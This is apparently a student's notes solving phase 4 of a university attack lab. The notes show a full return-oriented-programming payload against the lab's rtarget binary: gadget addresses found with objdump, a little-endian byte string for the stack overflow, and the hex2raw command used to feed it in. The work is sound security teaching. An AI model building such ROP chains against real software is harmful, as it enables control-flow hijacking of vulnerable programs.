objdump -d rtarget > rtarget_dump.txt

emacs rtarget_dump.txt
- (1) look for first occurrence of 58 (from pdf instructions, pg. 10, "B. Encodings of popq instructions"):
    00000000004019d4 <setval_178>:
        4019d4:	c7 07 58 90 90 90       movl   $0x90909058,(%rdi)
        4019da:	c3  
- gadget1:
address 4019d4 + 2 extra bytes (58 starts two bytes after) = 4019d6

- (2) look for first occurence of 48 89 c7 c3 (from pdf instruction, pg. 10, "A. Encodings of movq instructions")
    00000000004019c6 <addval_216>:
        4019c6:	8d 87 48 89 c7 c3       lea    -0x3c3876b8(%rdi),%eax
        4019cc:	c3                      retq
- gadget2: 
address 4019c6 + 2 extra bytes (48 starts two bytes after) = 4019c8


cookie.txt
0x76ebdb56 / 76 eb db 56
gadget1:
4019d6 / 40 19 d6
gadget2:
4019c8 / 40 19 c8

emacs phase4.txt
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00
d6 19 40 00 00 00 00 00     (gadget 1 in little endian)
56 db eb 76 00 00 00 00     (cookie in little endian)
c8 19 40 00 00 00 00 00     (gadget 2 in little endian)
5d 18 40 00 00 00 00 00     (touch2 - from phase 2)

./hex2raw < phase4.txt > raw-phase4.txt
./rtarget < raw-phase4.txt
